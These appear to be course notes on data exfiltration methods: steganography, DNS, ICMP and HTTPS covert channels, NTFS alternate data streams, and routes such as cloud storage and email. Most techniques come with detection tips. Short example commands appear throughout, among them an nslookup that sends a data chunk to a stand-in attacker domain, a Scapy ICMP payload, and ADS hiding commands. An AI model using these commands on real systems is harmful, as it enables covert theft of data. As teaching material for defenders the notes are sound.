- Exfiltration
- Definition: Covertly transferring data from a target system to an attacker-controlled location
- Purpose: Realize value of a breach by securing stolen information (e.g., PII, IP)
Covert Channels
- Definition: Transfer information in ways not easily detected by standard security tools
- Importance: Essential for bypassing security measures during penetration tests and real attacks
Steganography
- Concept: Embed secret payloads within non-secret media (images, audio, video)
- Example Tool: Java-based LSB steganography—converts ASCII text to binary, modifying image pixels
- Process:
- Select host file (e.g.,
photo.png)
- Convert secret message to binary
- Modify least significant bits of pixels, imperceptible to human eye
- Countermeasures:
- Use data loss prevention (DLP) tools to inspect for unusual file signatures
- Stego data bypasses signature matching by embedding inside media
- Analogy: Spy uses a newspaper ad; first letter of each word forms a secret message
DNS Covert Channels
- Technique: Break data into chunks, encode each chunk into DNS query subdomain
- Example Flow:
- Attacker-controlled DNS server responds to queries
- Compromised host performs
nslookup secretchunk.exfil.attacker.com
- DNS query payload captured and decoded by attacker
- Use Case: Appear as normal DNS traffic; minimal chance of detection by standard filtering
ICMP Covert Channels
- Technique: Embed hidden data in ICMP packet payloads (Echo Request/Reply)
- Example:
# Craft ICMP packet with Scapy
from scapy.all import IP, ICMP, send
pkt = IP(dst="10.0.0.5")/ICMP()/b"SECRET_DATA"
send(pkt)
- Rationale: ICMP often allowed through firewalls for diagnostics, making hidden data transport easy
- Detection: Monitor ICMP payload sizes or frequency anomalies
HTTPS Covert Channels
- Technique: Hide data within encrypted HTTPS requests/responses
- Example:
- Exfiltrate JSON payload via POST to
https://legit-site.com/login with hidden parameters
- Server logs appear normal; payload extracted by attacker later
- Rationale: Encrypted traffic resists inspection; security tools struggle to inspect without decryption
- Detection: Analyze TLS session metadata for unusual request sizes or timing patterns
Steganography: A Demonstration
- Practice: Hiding text in an image without altering appearance
- Steps:
- Choose image file (
cover.png)
- Insert message via LSB tool:
stego_tool hide -i cover.png -o stego.png -m secret.txt
- Distribute
stego.png; attacker extracts with:
stego_tool extract -i stego.png -o extracted.txt
- Key: No encryption; anyone with tool and method can retrieve hidden data
- Countermeasures: Use steganalysis tools, monitor for files with abnormal pixel patterns
Alternate Data Streams (ADS)
- Definition: NTFS feature allowing multiple data streams in a single filename
- Purpose: Originally for HFS compatibility; abused to hide data without changing file size
- Malicious Use:
- Hide sensitive data in
report.txt:hiddenStream:
echo HiddenSecret > report.txt:hiddenStream
- Transfer
report.txt; hidden data persists in ADS
- Retrieval:
more < report.txt:hiddenStream
- Detection & Prevention:
- Standard tools don’t show ADS; use Sysinternals Streams utility:
streams.exe C:\path\to\file
- Audit for unexpected ADS on critical files; enforce strict file access controls
Exfiltration Strategies
- Virtual Drive Mounting
- Mount attacker-controlled network share as local drive; copy sensitive files directly
- Email Exfiltration
- Attach compressed/encrypted archives to email; send to external address
- Cross-Account Resource Usage
- Use compromised cloud creds to upload data to attacker-controlled S3 bucket
- Cloud Storage
- Services like google drive, drop box, OneDrive for file sharing; already encrypted
- Text storage sites (Pastebins)
- allow users to public/privately host text file; obfuscated/encoded for detection